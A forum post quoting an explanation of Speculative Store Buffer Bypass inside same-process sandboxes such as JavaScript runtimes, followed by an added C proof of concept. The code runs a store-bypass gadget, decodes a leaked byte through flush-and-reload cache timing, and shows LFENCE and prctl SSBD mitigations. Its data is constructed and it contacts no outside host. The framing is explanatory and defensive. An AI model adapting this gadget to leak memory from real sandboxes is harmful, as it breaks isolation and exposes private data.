Originally posted by Royi
Unlike in previous attacks, Speculative Store Buffer Bypass (usually) allows only reading of memory locations from within the same privilege level. Thus, it would allow only a kernel to attack itself, or an application to read memory to which it already has legitimate access. It would, therefore, seem that such accesses are harmless and that it is implicitly safe to allow aggressive speculation. Unfortunately, this is not the case.
One potential problem arises when an application is implementing a sandbox or other attempt at isolation within a single running process. In this case, there are really two active contexts: the trusted sandbox environment, and the untrusted code running within it. Microprocessors are designed with the concept of different privilege levels, and of course, our entire computing world relies upon this in order to isolate processes and virtual machines from one another. But microprocessor designers don’t (traditionally) factor in separated contexts within the same process (same privilege or exception level). As a result, untrusted (possibly malicious) code can run within a sandbox and abuse store buffer speculation to read sensitive data from the sandbox itself.
In the common case of managed code environments (such as Java or JavaScript), an ability for managed code to dump arbitrary content from its managing process could be fatal to the security of the application, or of other applications running within the same shared process. The attack is possible because the code may be constructed to appear to perform benign reads of values to which it has legitimate access. These accesses are seen by the runtime security checks that validate the managed code prior to allowing it to execute. Unfortunately, the untrusted managed code could, in fact, be abusing speculation to see unsafe previous values of memory variables, pointers, and sensitive security structures through a cache side channel.
Note that JavaScript is run in web browsers and GNOME, for example.
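The pattern the quoted text describes, as an added example that is not part of the quoted Red Hat text or of Royi's post: a store that retargets a pointer slot from sandbox-private data to data the guest may read, followed by a load through that slot. Architecturally the load only ever sees the allowed value, which is all the runtime's checks can verify; speculatively it can run before the store's address is known and forward the stale pointer into a cache side channel. The block also shows the two mitigations a sandboxing runtime has: an LFENCE between the store and the load, and the Linux prctl that enables SSBD for the process. All names, the constructed secret/public bytes, the hit threshold and the trial count are assumptions; the timing part is x86 only and whether a byte actually leaks depends on the CPU and on whether SSBD is already forced system-wide.

```c
/* Added example (not from the quoted text or any project): Speculative Store
 * Bypass inside one process, plus the two mitigations a sandboxing runtime has.
 * Names, the constructed secret/public bytes and HIT_CYCLES are assumptions. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#ifdef __linux__
#include <sys/prctl.h>
#endif
#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
#define HAVE_X86 1
#else
#define HAVE_X86 0
#endif
#ifndef PR_SET_SPECULATION_CTRL   /* values from linux/prctl.h, for old headers */
#define PR_SET_SPECULATION_CTRL 53
#define PR_SPEC_STORE_BYPASS 0
#define PR_SPEC_DISABLE 4
#endif

#define STRIDE 512       /* one probe cache line per byte value, well apart     */
#define HIT_CYCLES 120   /* assumed cache-hit threshold in cycles; tune per CPU */
#define TRIALS 200

static char secret_data[] = "S";  /* constructed: data the sandbox keeps private */
static char public_data[] = "P";  /* constructed: data the guest may read        */
static uint8_t probe[256 * STRIDE];
/* The slot the guest may read through. Its own address is immediate, but the
 * store that retargets it goes through slot_ref, whose cache line is flushed
 * first so the store's address resolves late. Separate lines keep the flush
 * from also slowing the load. */
static char *volatile slot __attribute__((aligned(64)));
static char *volatile *volatile slot_ref __attribute__((aligned(64))) = &slot;

/* The gadget. Architecturally the load always returns public_data; while the
 * store's address is still unknown the load can execute first (SSB), forward
 * the stale secret pointer, and select a probe line with the secret byte. */
static void gadget(int with_fence) {
    char *volatile *s = slot_ref;      /* cache miss: store address unknown yet */
    *s = public_data;                  /* the store the load ought to wait for  */
#if HAVE_X86
    if (with_fence) _mm_lfence();      /* mitigation 1: drain before the load   */
#else
    (void)with_fence;
#endif
    char *p = slot;                    /* immediate address: may pass the store */
    volatile uint8_t sink = probe[(uint8_t)*p * STRIDE];
    (void)sink;
}

/* What the sandbox's own checks see: the legitimate value, never the secret. */
static char architectural_value(void) { gadget(0); return *slot; }

/* Decode the side channel: the byte whose line hit most often, if it hit in
 * more than a quarter of the trials and is not the byte touched legitimately. */
static int pick_leaked_byte(const unsigned hits[256], unsigned trials, int exclude) {
    int best = -1; unsigned best_hits = 0;
    for (int i = 0; i < 256; i++)
        if (i != exclude && hits[i] > best_hits) { best_hits = hits[i]; best = i; }
    return best_hits * 4 > trials ? best : -1;
}

#if HAVE_X86
static uint64_t time_read(volatile uint8_t *p) {
    _mm_mfence(); _mm_lfence();
    uint64_t t0 = __rdtsc();
    (void)*p;
    _mm_lfence();
    return __rdtsc() - t0;
}
#endif

/* Run the gadget TRIALS times; return the leaked byte or -1 if nothing stood
 * out (non-x86 build, SSBD already active, or a CPU that is not affected). */
static int ssb_leak_attempt(int with_fence, unsigned hits[256]) {
    memset(hits, 0, 256 * sizeof(unsigned));
#if !HAVE_X86
    (void)with_fence;
    return -1;
#else
    for (int t = 0; t < TRIALS; t++) {
        slot = secret_data;                    /* stale value the store replaces */
        for (int i = 0; i < 256; i++) _mm_clflush(&probe[i * STRIDE]);
        _mm_clflush((const void *)&slot_ref);
        _mm_mfence();
        gadget(with_fence);
        for (int i = 0; i < 256; i++) {
            int mix = (i * 167 + 13) & 255;    /* scrambled order defeats prefetch */
            if (time_read(&probe[mix * STRIDE]) < HIT_CYCLES) hits[mix]++;
        }
    }
    return pick_leaked_byte(hits, TRIALS, (uint8_t)public_data[0]);
#endif
}

/* Mitigation 2: have the kernel set SSBD for this process (Linux >= 4.17).
 * Returns 0, or -1 with errno set when the kernel or CPU offers no control. */
static int disable_store_bypass(void) {
#ifdef __linux__
    return prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_STORE_BYPASS, PR_SPEC_DISABLE, 0, 0);
#else
    errno = ENOSYS;
    return -1;
#endif
}

int main(void) {
    unsigned hits[256];
    printf("architectural read sees '%c'\n", architectural_value());
    int b = ssb_leak_attempt(0, hits);
    printf("no fence: %s\n", b >= 0 ? "leaked a byte" : "nothing leaked");
    if (b >= 0) printf("  leaked 0x%02x ('%c')\n", b, b);
    b = ssb_leak_attempt(1, hits);
    printf("lfence:   %s\n", b >= 0 ? "leaked a byte" : "nothing leaked");
    if (disable_store_bypass() != 0) { perror("prctl(PR_SET_SPECULATION_CTRL)"); return 0; }
    b = ssb_leak_attempt(0, hits);
    printf("ssbd:     %s\n", b >= 0 ? "leaked a byte" : "nothing leaked");
    return 0;
}
```

Build with `cc -O2 -o ssb ssb.c` and run it on the machine under test. The runtime's validator only ever sees `architectural_value()`, which is the point of the quoted text: every read in the gadget is to memory the guest may legitimately access. On a kernel that reports the mitigation in `/sys/devices/system/cpu/vulnerabilities/spec_store_bypass` as already forced on, the unfenced run will also report nothing leaked, so a quiet result is not by itself evidence that the CPU is unaffected.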